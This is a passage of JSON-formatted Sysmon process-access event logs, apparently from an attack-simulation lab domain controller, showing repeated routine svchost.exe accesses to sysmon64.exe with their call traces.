05:48:44.857","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3545,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.857","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3546,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.857","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3547,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.857","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3548,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.857","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3549,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.857","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3550,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.857","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3551,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.857","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3552,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 